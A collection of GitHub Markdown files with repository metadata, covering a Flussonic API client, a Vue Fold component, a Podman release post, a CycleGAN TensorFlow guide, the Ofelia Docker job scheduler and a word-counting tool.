61124f23b081fa1aaafc26ef3bc1518a427d4926 | 641 | md | Markdown | README.md | smirnovpaul/flussonic-api-py | 22d7545a11df945edf87257471b8604a0e06b082 | [
"MIT"
] | null | null | null | README.md | smirnovpaul/flussonic-api-py | 22d7545a11df945edf87257471b8604a0e06b082 | [
"MIT"
] | null | null | null | README.md | smirnovpaul/flussonic-api-py | 22d7545a11df945edf87257471b8604a0e06b082 | [
"MIT"
] | null | null | null | # Flussonic-api-py
Flussonic client API for connection server.
Unofficial, created on the basis of the documentation.
Active link of [official project](http://erlyvideo.ru/doc)
### Frameworks/language:
* **Python 2.7.x/3.x**
* **Django > 1.6**
* **Flask > 0.8**
### API:
* Database (simple MySQL-like emulation);
* DVR;
* HTTP (methods from the documentation).
### Documentation with Mkdocs (TODOS):
* API;
* Connection;
* More details.
### Install:
```sh
git clone https://github.com/smirnovpaul/flussonic-api-py.git
cd flussonic-api-py
pip install -r requirements.txt
```
**Don't forget** to enable logging.
### License:
----
MIT | 16.868421 | 61 | 0.686427 | eng_Latn | 0.422809 |
6113129db0364a5a9f7bdb845f022046c122c452 | 1,499 | md | Markdown | docs/Fold/README.md | battleaxedotco/brutalism-docs | 75b75bcb113808fb69db282d3107b59b26cc84ec | [
"MIT"
] | null | null | null | docs/Fold/README.md | battleaxedotco/brutalism-docs | 75b75bcb113808fb69db282d3107b59b26cc84ec | [
"MIT"
] | 6 | 2020-06-14T06:28:02.000Z | 2022-02-27T03:43:18.000Z | docs/Fold/README.md | battleaxedotco/brutalism-docs | 75b75bcb113808fb69db282d3107b59b26cc84ec | [
"MIT"
] | null | null | null | # Fold
## Styles
```html
<Fold label="Default">
<Fold label="Nested Default">
<Button label="Slot content" />
</Fold>
</Fold>
```
| Property | Type | Default | Description |
|:---|:---|:---| ---:|
| | | | |
## Props
```html
<Fold label='mount as open' :open="true">
<Button label="Slot content" />
</Fold>
<Fold prefs-id="exampleID" label="auto-save state">
<Button label="Slot content" />
</Fold>
<Fold label='persistent' :persistent="false">
<Button label="Slot content" />
</Fold>
<Fold label='inner-padding' inner-padding="30px">
<Button label="Slot content" />
</Fold>
```
| Property | Type | Default | Description |
|:---|:---|:---| ---:|
| label | String | | Text to appear before folding icon |
| open | Boolean | false | Reactive prop to open and shut component |
| prefs-id | String | | Autosave value in localStorage |
| persistent | Boolean | true | If false, contents are destroyed when shut |
| inner-padding | String | | Padding assigned between parent and slot |
## Events
```html
<Fold label='@click' :open="true" @click="testClick">
<Button label="Slot content" />
</Fold>
<Fold label='@prefs' :open="true" prefs-id="foldExampleEvent" @prefs="testPrefs">
<Button label="Slot content" />
</Fold>
```
| Event | Arguments | Description |
|:---|:---| ---:|
| @click | callback() | Method to execute on native click event |
| @prefs | callback( item ) | Returns on component mount with prefs value |
| 25.844828 | 83 | 0.609073 | eng_Latn | 0.741987 |
6113284f5a07f701ba069e41ebac81fc4b92e4f0 | 1,663 | md | Markdown | _posts/2018-08-20-podman-alpha-v0.8.3.md | edhaynes/podman.io | 8557214cb9041ccdc6863dbe81073f5803c0b75c | [
"MIT"
] | 2 | 2020-12-03T08:16:10.000Z | 2021-12-28T05:59:40.000Z | _posts/2018-08-20-podman-alpha-v0.8.3.md | edhaynes/podman.io | 8557214cb9041ccdc6863dbe81073f5803c0b75c | [
"MIT"
] | 1 | 2021-02-23T16:32:28.000Z | 2021-02-23T16:32:28.000Z | _posts/2018-08-20-podman-alpha-v0.8.3.md | edhaynes/podman.io | 8557214cb9041ccdc6863dbe81073f5803c0b75c | [
"MIT"
] | 2 | 2021-04-01T13:47:20.000Z | 2021-09-29T15:23:48.000Z | ---
title: Podman Alpha version 0.8.3 Release Announcement
layout: default
author: bbaude
categories: [releases]
tags: community, open source, podman
---
<img src="https://podman.io/images/podman.svg" alt="podman logo">
# Podman release 0.8.3
Our release this week was very smooth. It seems like between CI infrastructure stability, last-minute pull requests, and sometimes just plain bad luck, something always gives us trouble on Fridays. The Fedora packages are created and I see that they are getting their karma and working through the process already.
By the way, we moved! Our new upstream location is [https://github.com/containers/podman](https://github.com/containers/podman). It seems to be a more natural fit for our project and more closely associates us with some of our sister projects.
<!--readmore-->
Some of the more obvious changes in this release are:
* Updated documentation to mention that systemd is now the default cgroup manager.
* The create|run switch `--uts=host` now works correctly.
* Add pod stats as a sub-command. Similar to podman stats, it allows you to see statistics about running pods and their containers.
* Varlink API endpoints for many of the pod subcommands were added.
* Support the format option for the varlink API endpoint Commit (OCI or Docker).
* Fix handling of the container’s hostname when using `--net=host`
* When searching multiple registries, do not make an error from one registry be fatal.
* Create and Pull commands were added to the python client.
Our IRC channel has not moved. Much of the development team can be found on Freenode in #podman. Come by and introduce yourself!
| 57.344828 | 315 | 0.764883 | eng_Latn | 0.998578 |
61134a309f345bbfc7dcf6cccbf4a7d92b573a48 | 56 | md | Markdown | README.md | ikosan91/flutter_demos | d9ba5de60a71d6968493a0aa3e8d745d6f7744e6 | [
"MIT"
] | null | null | null | README.md | ikosan91/flutter_demos | d9ba5de60a71d6968493a0aa3e8d745d6f7744e6 | [
"MIT"
] | null | null | null | README.md | ikosan91/flutter_demos | d9ba5de60a71d6968493a0aa3e8d745d6f7744e6 | [
"MIT"
] | null | null | null | # flutter_demos
Flutter demonstrations for web articles
| 18.666667 | 39 | 0.857143 | eng_Latn | 0.812497 |
61137fed62f7ffa1fdf94bb6c6038238b5922991 | 412 | md | Markdown | src/main/resources/beetlsql/mysql/newslist.md | LiuAustin/ptg | 28b145074c70b6b3d2d7b3f1106c6b47f3c855e5 | [
"Apache-2.0"
] | null | null | null | src/main/resources/beetlsql/mysql/newslist.md | LiuAustin/ptg | 28b145074c70b6b3d2d7b3f1106c6b47f3c855e5 | [
"Apache-2.0"
] | null | null | null | src/main/resources/beetlsql/mysql/newslist.md | LiuAustin/ptg | 28b145074c70b6b3d2d7b3f1106c6b47f3c855e5 | [
"Apache-2.0"
] | null | null | null | list
===
SELECT
blade_newslist.*,bd.name,
cbu.name AS createUser,
ubu.name AS updateUser
FROM
blade_newslist
LEFT JOIN blade_user cbu ON blade_newslist.creater = cbu.id
LEFT JOIN blade_user ubu ON blade_newslist.updater = ubu.id
LEFT JOIN blade_dict bd ON blade_newslist.category=bd.num AND bd.code=108
listCategoryView
===
SELECT d.name FROM blade_newslist t, blade_dict d WHERE d.code=108
AND d.num=t.category
6114b5e799804e20700b4a2edc31b2d097abc96f | 122 | md | Markdown | README.md | ShaonMajumder/Cylinder_Band | 19e957351f56e1d4854cec91983dffebf8434402 | [
"Apache-2.0"
] | 2 | 2018-07-23T09:48:58.000Z | 2018-07-23T09:53:05.000Z | README.md | ShaonMajumder/Cylinder_Band | 19e957351f56e1d4854cec91983dffebf8434402 | [
"Apache-2.0"
] | null | null | null | README.md | ShaonMajumder/Cylinder_Band | 19e957351f56e1d4854cec91983dffebf8434402 | [
"Apache-2.0"
] | null | null | null | # Cylinder_Band
## Download
For downloading use
`git clone https://github.com/ShaonMajumder/Cylinder_Band.git`
| 24.4 | 70 | 0.729508 | yue_Hant | 0.638744 |
6114ff385ec66f10f97117ef1f6409f22c3a7883 | 126 | md | Markdown | .github/PULL_REQUEST_TEMPLATE.md | azeezolaniran2016/todo-api | bd2d2c6e0afda373b9c3a607a72b2c0cf04b6075 | [
"MIT"
] | null | null | null | .github/PULL_REQUEST_TEMPLATE.md | azeezolaniran2016/todo-api | bd2d2c6e0afda373b9c3a607a72b2c0cf04b6075 | [
"MIT"
] | null | null | null | .github/PULL_REQUEST_TEMPLATE.md | azeezolaniran2016/todo-api | bd2d2c6e0afda373b9c3a607a72b2c0cf04b6075 | [
"MIT"
] | null | null | null | #### Relevant project management (Trello, Jira) story?
#### Documentations?
#### Test strategy?
#### Screenshots (if any)?
| 15.75 | 54 | 0.650794 | eng_Latn | 0.452816 |
611529fe017c404c5898229fde937567bba92be2 | 3,990 | md | Markdown | content/en/docs/project-user-guide/grayscale-release/blue-green-deployment.md | rockpanda/website | 4c88545f66e08a99194fa4d252542c7f55f9610b | [
"Apache-2.0"
] | null | null | null | content/en/docs/project-user-guide/grayscale-release/blue-green-deployment.md | rockpanda/website | 4c88545f66e08a99194fa4d252542c7f55f9610b | [
"Apache-2.0"
] | null | null | null | content/en/docs/project-user-guide/grayscale-release/blue-green-deployment.md | rockpanda/website | 4c88545f66e08a99194fa4d252542c7f55f9610b | [
"Apache-2.0"
] | null | null | null | ---
title: "Blue-green Deployment"
keywords: 'KubeSphere, Kubernetes, service mesh, istio, release, blue-green deployment'
description: 'Learn how to release a blue-green deployment in KubeSphere.'
linkTitle: "Blue-green Deployment"
weight: 10520
---
The blue-green release provides a zero downtime deployment, which means the new version can be deployed with the old one preserved. At any time, only one of the versions is active serving all the traffic, while the other one remains idle. If a problem occurs with the running version, you can quickly roll back to the old one.

## Prerequisites
- You need to enable [KubeSphere Service Mesh](../../../pluggable-components/service-mesh/).
- You need to create a workspace, a project and an account (`project-regular`). The account must be invited to the project with the role of `operator`. For more information, see [Create Workspaces, Projects, Accounts and Roles](../../../quick-start/create-workspace-and-project/).
- You need to enable **Application Governance** and have an available app so that you can implement the blue-green deployment for it. The sample app used in this tutorial is Bookinfo. For more information, see [Deploy Bookinfo and Manage Traffic](../../../quick-start/deploy-bookinfo-to-k8s/).
## Create a Blue-green Deployment Job
1. Log in to KubeSphere as `project-regular` and navigate to **Grayscale Release**. Under **Categories**, click **Create Job** on the right of **Blue-green Deployment**.
2. Set a name for it and click **Next**.
3. On the **Grayscale Release Components** tab, select your app from the drop-down list and the Service for which you want to implement the blue-green deployment. If you also use the sample app Bookinfo, select **reviews** and click **Next**.
4. On the **Grayscale Release Version** tab, add another version (e.g. `v2`) as shown in the image below and click **Next**:

{{< notice note >}}
The image version is `v2` in the screenshot.
{{</ notice >}}
5. On the **Policy Config** tab, to allow the app version `v2` to take over all the traffic, select **Take over all traffic** and click **Create**.
6. The blue-green deployment job created displays under the tab **Job Status**. Click it to view details.

7. Wait for a while and you can see all the traffic go to the version `v2`:

8. The new **Deployment** is created as well.

9. You can directly get the virtual service to identify the weight by executing the following command:
```bash
kubectl -n demo-project get virtualservice -o yaml
```
{{< notice note >}}
- When you execute the command above, replace `demo-project` with your own project (i.e. namespace) name.
- If you want to execute the command from the web kubectl on the KubeSphere console, you need to use the account `admin`.
{{</ notice >}}
10. Expected output:
```yaml
...
spec:
hosts:
- reviews
http:
- route:
- destination:
host: reviews
port:
number: 9080
subset: v2
weight: 100
...
```
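For comparison, a rollback to `v1` would correspond to a VirtualService spec like the sketch below. This is hand-written from the output above, not generated by the console; the `reviews` name, `demo-project` namespace, and port `9080` are assumptions carried over from this example, and in practice the grayscale release job manages these fields for you:

```yaml
apiVersion: networking.istio.io/v1alpha3
kind: VirtualService
metadata:
  name: reviews
  namespace: demo-project
spec:
  hosts:
    - reviews
  http:
    - route:
        - destination:
            host: reviews
            port:
              number: 9080
            subset: v1
          weight: 100
```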
## Take a Job Offline
After you implement the blue-green deployment, if the result meets your expectations, you can take the job offline and remove the version `v1` by clicking **Job offline**.

| 44.333333 | 320 | 0.711278 | eng_Latn | 0.98855 |
61154db736305fb732eae2072ae4758d139ae23d | 221 | md | Markdown | _includes/p/135/1353B.md | akoprow/codeforces-editorials | 09e14544afb027c7ce926630ed31a7bc18ce54b2 | [
"CC0-1.0"
] | null | null | null | _includes/p/135/1353B.md | akoprow/codeforces-editorials | 09e14544afb027c7ce926630ed31a7bc18ce54b2 | [
"CC0-1.0"
] | null | null | null | _includes/p/135/1353B.md | akoprow/codeforces-editorials | 09e14544afb027c7ce926630ed31a7bc18ce54b2 | [
"CC0-1.0"
] | null | null | null | Fairly simple take: $$n-k$$ largest elements from $$a$$ and $$k$$ largest elements from union of $$k$$ largest elements of $$b$$ and remaining elements from $$a$$ (we can either keep them or swap for largest from $$b$$).
| 110.5 | 220 | 0.687783 | eng_Latn | 0.999678 |
6115e3fb49bbb58e56f82f330b7fd7766cfd7485 | 263 | md | Markdown | README.md | blacxcode/eBIOT-System | f16953ac132b92ee18cc64751641c814c58475dc | [
"Apache-2.0"
] | null | null | null | README.md | blacxcode/eBIOT-System | f16953ac132b92ee18cc64751641c814c58475dc | [
"Apache-2.0"
] | null | null | null | README.md | blacxcode/eBIOT-System | f16953ac132b92ee18cc64751641c814c58475dc | [
"Apache-2.0"
] | null | null | null | # eBIOT-System
eBIOT System is an electronic device designed to assist in alerting somebody in emergency situations where a threat to persons or property exists. The device is also equipped with an access control system (ACS) to activate other electronic devices.
| 87.666667 | 247 | 0.828897 | eng_Latn | 0.999821 |
61161e5e4717013d6d3fa5375edd9f9b066dfd64 | 144 | md | Markdown | translations/zh-CN/data/reusables/enterprise_site_admin_settings/repository-search.md | Hardik-Ghori/docs | a1910a7f8cedd4485962ad0f0c3c93d7348709a5 | [
"CC-BY-4.0",
"MIT"
] | 20 | 2021-02-17T16:18:11.000Z | 2022-03-16T08:30:36.000Z | translations/zh-CN/data/reusables/enterprise_site_admin_settings/repository-search.md | 0954011723/docs | d51685810027d8071e54237bbfd1a9fb7971941d | [
"CC-BY-4.0",
"MIT"
] | 40 | 2020-10-21T12:54:07.000Z | 2021-07-23T06:10:46.000Z | translations/zh-CN/data/reusables/enterprise_site_admin_settings/repository-search.md | 0954011723/docs | d51685810027d8071e54237bbfd1a9fb7971941d | [
"CC-BY-4.0",
"MIT"
] | 3 | 2021-03-31T18:21:34.000Z | 2021-04-10T21:07:53.000Z | 1. 在搜索字段中,输入仓库的名称,然后单击 **Search(搜索)**。 
| 72 | 143 | 0.770833 | kor_Hang | 0.286205 |
6117226fc6ca3ff50cd838a1aa6db9737d084448 | 62 | md | Markdown | README.md | rukiy/RStandardFramework | 71f3022e8ede68989821286d3ddbbcad0f31606b | [
"Apache-2.0"
] | null | null | null | README.md | rukiy/RStandardFramework | 71f3022e8ede68989821286d3ddbbcad0f31606b | [
"Apache-2.0"
] | null | null | null | README.md | rukiy/RStandardFramework | 71f3022e8ede68989821286d3ddbbcad0f31606b | [
"Apache-2.0"
] | null | null | null | # RStandardFramework
Rukiy Standard Framework
SpringBoot 2.X | 15.5 | 24 | 0.83871 | kor_Hang | 0.632142 |
61172571fdf5042fc411e3e2022350403acaa09f | 2,140 | md | Markdown | docs/deployment/how-to-enable-autostart-for-cd-installations.md | mairaw/visualstudio-docs.pt-br | 26480481c1cdab3e77218755148d09daec1b3454 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/deployment/how-to-enable-autostart-for-cd-installations.md | mairaw/visualstudio-docs.pt-br | 26480481c1cdab3e77218755148d09daec1b3454 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/deployment/how-to-enable-autostart-for-cd-installations.md | mairaw/visualstudio-docs.pt-br | 26480481c1cdab3e77218755148d09daec1b3454 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2021-07-26T14:58:39.000Z | 2021-07-26T14:58:39.000Z | ---
title: 'How to: enable AutoStart for CD installations | Microsoft Docs'
ms.custom: ''
ms.date: 11/04/2016
ms.technology: vs-ide-deployment
ms.topic: conceptual
dev_langs:
- VB
- CSharp
- C++
helpviewer_keywords:
- ClickOnce deployment, AutoStart
- ClickOnce deployment, installation on CD or DVD
- deploying applications [ClickOnce], installation on CD or DVD
ms.assetid: caaec619-900c-4790-90e3-8c91f5347635
author: mikejo5000
ms.author: mikejo
manager: douge
ms.workload:
- multiple
ms.openlocfilehash: 97642a499e0415dd6fcd245e379c9f01520b5c53
ms.sourcegitcommit: 0e5289414d90a314ca0d560c0c3fe9c88cb2217c
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 07/19/2018
ms.locfileid: "39151240"
---
# <a name="how-to-enable-autostart-for-cd-installations"></a>How to: enable AutoStart for CD installations
When you deploy a [!INCLUDE[ndptecclick](../deployment/includes/ndptecclick_md.md)] application through removable media such as a CD-ROM or DVD-ROM, you can enable `AutoStart` so that the [!INCLUDE[ndptecclick](../deployment/includes/ndptecclick_md.md)] application starts automatically when the media is inserted.
`AutoStart` can be enabled on the **Publish** page of the **Project Designer**.
### <a name="to-enable-autostart"></a>To enable AutoStart
1. With a project selected in **Solution Explorer**, on the **Project** menu, click **Properties**.
2. Click the **Publish** tab.
3. Click the **Options** button.
The **Publish Options** dialog box appears.
4. Click **Deployment**.
5. Select the **For CD installations, automatically start Setup when CD is inserted** check box.
An *Autorun* file will be copied to the publish location when the application is published.
## <a name="see-also"></a>See also
[Publishing ClickOnce applications](../deployment/publishing-clickonce-applications.md)
[How to: publish a ClickOnce application using the Publish Wizard](../deployment/how-to-publish-a-clickonce-application-using-the-publish-wizard.md) | 41.960784 | 331 | 0.754673 | por_Latn | 0.944155 |
6117fc43a5a00a0830c63372be21075e5e79be72 | 4,446 | md | Markdown | README.md | MHC-CycleGAN-Research/cyclegan-1 | 4c875b5a575d22c5925216285222ffe2c34cf788 | [
"MIT"
] | null | null | null | README.md | MHC-CycleGAN-Research/cyclegan-1 | 4c875b5a575d22c5925216285222ffe2c34cf788 | [
"MIT"
] | null | null | null | README.md | MHC-CycleGAN-Research/cyclegan-1 | 4c875b5a575d22c5925216285222ffe2c34cf788 | [
"MIT"
] | null | null | null | # CycleGAN in TensorFlow
**[update 9/26/2017]** We observed faster convergence and better performance after adding skip connection between input and output in the generator. To turn the feature on, use switch --skip=True. This is the result of turning on skip after training for 23 epochs:
<img src='imgs/skip_result.jpg' width="900px"/>
This is the TensorFlow implementation for CycleGAN. The code was written by [Harry Yang](https://www.harryyang.org) and [Nathan Silberman](https://github.com/nathansilberman).
CycleGAN: [[Project]](https://junyanz.github.io/CycleGAN/) [[Paper]](https://arxiv.org/pdf/1703.10593.pdf)
## Introduction
This code contains two versions of the network architectures and hyper-parameters. The first one is based on the [TensorFlow implementation](https://github.com/hardikbansal/CycleGAN). The second one is based on the [official PyTorch implementation](https://github.com/junyanz/pytorch-CycleGAN-and-pix2pix). The differences are minor and we observed that both versions produced good results. You may need to train several times, as the quality of the results is sensitive to the initialization.
Below is a snapshot of our result at the 50th epoch on one training instance:
<img src='imgs/horse2zebra.png' width="900px"/>
## Getting Started
### Prepare dataset
* You can either download one of the default CycleGAN datasets or use your own dataset.
* Download a CycleGAN dataset (e.g. horse2zebra):
```bash
bash ./download_datasets.sh horse2zebra
```
* Use your own dataset: put images from each domain at folder_a and folder_b respectively.
* Create the csv file as input to the data loader.
* Edit the cyclegan_datasets.py file. For example, if you have a face2ramen_train dataset which contains 800 face images and 1000 ramen images, both in PNG format, you can edit cyclegan_datasets.py as follows:
```python
DATASET_TO_SIZES = {
'face2ramen_train': 1000
}
PATH_TO_CSV = {
'face2ramen_train': './CycleGAN/input/face2ramen/face2ramen_train.csv'
}
DATASET_TO_IMAGETYPE = {
'face2ramen_train': '.png'
}
```
* Run create_cyclegan_dataset.py:
```bash
python -m CycleGAN_TensorFlow.create_cyclegan_dataset --image_path_a=folder_a --image_path_b=folder_b --dataset_name="horse2zebra_train" --do_shuffle=0
```
### Training
* Create the configuration file. The configuration file contains basic information for training/testing. An example configuration file can be found at configs/exp_01.json.
* Start training:
```bash
python -m CycleGAN_TensorFlow.main \
--to_train=1 \
--log_dir=CycleGAN_TensorFlow/output/cyclegan/exp_01 \
--config_filename=CycleGAN_TensorFlow/configs/exp_01.json
```
* Check the intermediate results.
* Tensorboard
```bash
tensorboard --port=6006 --logdir=CycleGAN_TensorFlow/output/cyclegan/exp_01/#timestamp#
```
* Check the html visualization at CycleGAN_TensorFlow/output/cyclegan/exp_01/#timestamp#/epoch_#id#.html.
### Restoring from the previous checkpoint.
```bash
python -m CycleGAN_TensorFlow.main \
--to_train=2 \
--log_dir=CycleGAN_TensorFlow/output/cyclegan/exp_01 \
--config_filename=CycleGAN_TensorFlow/configs/exp_01.json \
--checkpoint_dir=CycleGAN_TensorFlow/output/cyclegan/exp_01/#timestamp#
```
### Testing
* Create the testing dataset.
* Edit the cyclegan_datasets.py file the same way as training.
* Create the csv file as the input to the data loader.
```bash
python -m CycleGAN_TensorFlow.create_cyclegan_dataset --image_path_a=folder_a --image_path_b=folder_b --dataset_name="horse2zebra_test" --do_shuffle=0
```
* Run testing.
```bash
python -m CycleGAN_TensorFlow.main \
--to_train=0 \
--log_dir=CycleGAN_TensorFlow/output/cyclegan/exp_01 \
--config_filename=CycleGAN_TensorFlow/configs/exp_01_test.json \
--checkpoint_dir=CycleGAN_TensorFlow/output/cyclegan/exp_01/#old_timestamp#
```
The result is saved in CycleGAN_TensorFlow/output/cyclegan/exp_01/#new_timestamp#.
## What I did to run it: (in the home directory)
0. download dataset zip file and extract it in input folder in cyclegan-1
1. create dataset using this command (it generates csv file):
```bash
python -m cyclegan-1.create_cyclegan_dataset --dataset_name="horse2zebra_train" --do_shuffle=0
```
2. train the network
```bash
python -m cyclegan-1.main --to_train=1 --log_dir=./cyclegan-1/output/cyclegan/exp_01 --config_filename=./cyclegan-1/configs/exp_01.json
```
| 41.551402 | 490 | 0.765182 | eng_Latn | 0.890939 |
6119b8b49c901c45cc5570d4025abbe3fc7fe11f | 1,026 | md | Markdown | src/packages/gesture/doc.md | afc163/nutui | c5c6a3fd02b22003b8005df980ae292169f433e3 | [
"MIT"
] | 1 | 2020-12-31T01:31:07.000Z | 2020-12-31T01:31:07.000Z | src/packages/gesture/doc.md | afc163/nutui | c5c6a3fd02b22003b8005df980ae292169f433e3 | [
"MIT"
] | null | null | null | src/packages/gesture/doc.md | afc163/nutui | c5c6a3fd02b22003b8005df980ae292169f433e3 | [
"MIT"
] | null | null | null | # Gesture 手势组件
基于[hammer.js](http://hammerjs.github.io/getting-started/)封装,支持移动端各种手势操作。包括'tap', 'pan', 'pinch', 'press', 'rotate', 'swipe'
## 基本用法
```html
<div class="item" v-gesture:pan="test1" v-gesture:panend="test2" :style="{ left: left, top: top }">
Pan
</div>
```
## Pan in a specified direction
```html
<div class="item" v-gesture:pan.left="test3">
Pan left
</div>
```
## Swipe in a specified direction
```html
<div class="item" v-gesture:swipe.horizontal="test3">
swipe
</div>
```
## Binding multiple events
```html
<div class="item" v-gesture:press="test3" v-gesture:tap="test3" v-gesture:pan="test3">
press, tap, pan
</div>
<script>
export default {
data() {
return {
left: 0,
top: 70,
posX: 0,
posY: 70
};
},
mounted() {},
methods: {
test1(e) {
this.left = parseInt(this.posX) + e.deltaX + 'px';
this.top = parseInt(this.posY) + e.deltaY + 'px';
},
test2(e) {
this.posX = this.left;
this.posY = this.top;
},
test3(e) {
console.log(e.deltaX, e.deltaY);
}
}
};
</script>
```
| 18.654545 | 123 | 0.560429 | kor_Hang | 0.112609 |
611a2715a9ddf02e24b013254af3ef1c61a7ca8b | 6,300 | md | Markdown | README.md | vigasin/ofelia | 20df97afeee3efa5ffca68913e2b43c1d5b3e23a | [
"MIT"
] | null | null | null | README.md | vigasin/ofelia | 20df97afeee3efa5ffca68913e2b43c1d5b3e23a | [
"MIT"
] | null | null | null | README.md | vigasin/ofelia | 20df97afeee3efa5ffca68913e2b43c1d5b3e23a | [
"MIT"
] | null | null | null | # Ofelia - a job scheduler [](https://github.com/vigasin/ofelia/releases) [](http://codecov.io/github/vigasin/ofelia?branch=master) [](https://travis-ci.org/vigasin/ofelia)
<img src="https://weirdspace.dk/FranciscoIbanez/Graphics/Ofelia.gif" align="right" width="180px" height="300px" vspace="20" />
**Ofelia** is a modern and low footprint job scheduler for __docker__ environments, built on Go. Ofelia aims to be a replacement for the old fashioned [cron](https://en.wikipedia.org/wiki/Cron).
### Why?
It has been a long time since [`cron`](https://en.wikipedia.org/wiki/Cron) was released, actually more than 28 years. The world has changed a lot and especially since the `Docker` revolution. **Vixie's cron** works great but it's not extensible and it's hard to debug when something goes wrong.
Many solutions are available: ready-to-go containerized `cron`s, wrappers for your commands, etc., but in the end simple tasks become complex.
### How?
The main feature of **Ofelia** is the ability to execute commands directly on Docker containers. Using Docker's API, Ofelia emulates the behavior of [`exec`](https://docs.docker.com/reference/commandline/exec/), so it can run a command inside of a running container. You can also run the command in a new container, destroying it at the end of the execution.
## Configuration
### Jobs
[Scheduling format](https://godoc.org/github.com/robfig/cron) is the same as the Go implementation of `cron`. E.g. `@every 10s` or `0 0 1 * * *` (every night at 1 AM).
**Note**: the format starts with seconds, instead of minutes.
You can configure four different kinds of jobs:
- `job-exec`: this job is executed inside of a running container.
- `job-run`: runs a command inside of a new container, using a specific image.
- `job-local`: runs the command inside of the host running ofelia.
- `job-service-run`: runs the command inside a new "run-once" service, for running inside a swarm
See [Jobs reference documentation](docs/jobs.md) for all available parameters.
#### INI-style config
Run with `ofelia daemon --config=/path/to/config.ini`
```ini
[job-exec "job-executed-on-running-container"]
schedule = @hourly
container = my-container
command = touch /tmp/example
[job-run "job-executed-on-new-container"]
schedule = @hourly
image = ubuntu:latest
command = touch /tmp/example
[job-local "job-executed-on-current-host"]
schedule = @hourly
command = touch /tmp/example
[job-service-run "service-executed-on-new-container"]
schedule = 0,20,40 * * * *
image = ubuntu
network = swarm_network
command = touch /tmp/example
```
#### Docker labels configurations
In order to use this type of configuration, Ofelia needs access to the Docker socket.
```sh
docker run -it --rm \
-v /var/run/docker.sock:/var/run/docker.sock:ro \
--label ofelia.job-local.my-test-job.schedule="@every 5s" \
--label ofelia.job-local.my-test-job.command="date" \
mcuadros/ofelia:latest daemon --docker
```
Label format: `ofelia.<JOB_TYPE>.<JOB_NAME>.<JOB_PARAMETER>=<PARAMETER_VALUE>`.
This type of configuration supports all the capabilities provided by INI files.
It is also possible to configure `job-exec` jobs by setting label configurations on the target container. To do that, the additional label `ofelia.enabled=true` needs to be present on the target container.
For example, say we want `ofelia` to execute the `uname -a` command in an existing container called `my_nginx`.
To do that, we need to start the `my_nginx` container with the following configuration:
```sh
docker run -it --rm \
--label ofelia.enabled=true \
--label ofelia.job-exec.test-exec-job.schedule="@every 5s" \
--label ofelia.job-exec.test-exec-job.command="uname -a" \
nginx
```
Now if we start the `ofelia` container with the command provided above, it will pick up two jobs:
- Local - `date`
- Exec - `uname -a`
Or with docker-compose:
```yaml
version: "3"
services:
ofelia:
image: mcuadros/ofelia:latest
depends_on:
- nginx
command: daemon --docker
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
labels:
ofelia.job-local.my-test-job.schedule: "@every 5s"
ofelia.job-local.my-test-job.command: "date"
nginx:
image: nginx
labels:
ofelia.enabled: "true"
ofelia.job-exec.datecron.schedule: "@every 5s"
ofelia.job-exec.datecron.command: "uname -a"
```
### Logging
**Ofelia** comes with three different logging drivers that can be configured in the `[global]` section:
- `mail` to send mails
- `save` to save structured execution reports to a directory
- `slack` to send messages via a slack webhook
#### Options
- `smtp-host` - address of the SMTP server.
- `smtp-port` - port number of the SMTP server.
- `smtp-user` - user name used to connect to the SMTP server.
- `smtp-password` - password used to connect to the SMTP server.
- `email-to` - mail address of the receiver of the mail.
- `email-from` - mail address of the sender of the mail.
- `mail-only-on-error` - only send a mail if the execution was not successful.
- `save-folder` - directory in which the reports shall be written.
- `save-only-on-error` - only save a report if the execution was not successful.
- `slack-webhook` - URL of the slack webhook.
- `slack-only-on-error` - only send a slack message if the execution was not successful.
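Putting a few of these options together, a sketch of a `[global]` section that mails a report only when a job fails might look like this (the SMTP host, credentials, and addresses are placeholders):

```ini
[global]
smtp-host = smtp.example.com
smtp-port = 587
smtp-user = ofelia
smtp-password = changeme
email-from = ofelia@example.com
email-to = ops@example.com
mail-only-on-error = true
```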
### Overlap
**Ofelia** can prevent a job from running twice in parallel (e.g. if the first execution didn't complete before a second execution was scheduled). If a job has the option `no-overlap` set, it will not be run concurrently.
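For example, a sketch of a job guarded against overlapping runs (the container name and command are illustrative):

```ini
[job-exec "slow-report"]
schedule = @every 1m
container = my-container
command = /usr/local/bin/generate-report.sh
no-overlap = true
```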
## Installation
The easiest way to deploy **ofelia** is using *Docker*.
```sh
docker run -it -v /etc/ofelia:/etc/ofelia vigasin/ofelia:latest
```
Don't forget to place your `config.ini` at your host machine.
If you don't want to run **ofelia** using our *Docker* image, you can download a binary from the [releases](https://github.com/vigasin/ofelia/releases) page.
> Why is the project named Ofelia? Ofelia is the name of the office assistant from the Spanish comic [Mortadelo y Filemón](https://en.wikipedia.org/wiki/Mort_%26_Phil)
| 40.645161 | 375 | 0.726667 | eng_Latn | 0.969903 |
611b54d3835406452916a8d5ea2d3f4e91074cfb | 455 | md | Markdown | docs/OutputStatusResponse.md | lab5e/java-spanapi | 731c09ca5b2c49425c0883ea6c58cca1cc96ca90 | [
"BSD-2-Clause"
] | null | null | null | docs/OutputStatusResponse.md | lab5e/java-spanapi | 731c09ca5b2c49425c0883ea6c58cca1cc96ca90 | [
"BSD-2-Clause"
] | null | null | null | docs/OutputStatusResponse.md | lab5e/java-spanapi | 731c09ca5b2c49425c0883ea6c58cca1cc96ca90 | [
"BSD-2-Clause"
] | null | null | null |
# OutputStatusResponse
## Properties
Name | Type | Description | Notes
------------ | ------------- | ------------- | -------------
**collectionId** | **String** | | [optional]
**outputId** | **String** | | [optional]
**enabled** | **Boolean** | | [optional]
**errorCount** | **Integer** | | [optional]
**forwarded** | **Integer** | | [optional]
**received** | **Integer** | | [optional]
**retransmits** | **Integer** | | [optional]
| 22.75 | 60 | 0.487912 | kor_Hang | 0.132359 |
611b90605a28431e924b81150f19c1f21e3417d4 | 763 | md | Markdown | README.md | lucaswadedavis/enumero | 952578f00da5ed748d371d1ef3872985bd5708d0 | [
"MIT"
] | null | null | null | README.md | lucaswadedavis/enumero | 952578f00da5ed748d371d1ef3872985bd5708d0 | [
"MIT"
] | null | null | null | README.md | lucaswadedavis/enumero | 952578f00da5ed748d371d1ef3872985bd5708d0 | [
"MIT"
] | null | null | null | ###Enumero is a tool for counting tokens (usually words).
- I've used it to count phrases in foreign languages (so I'd know what to learn to translate first)
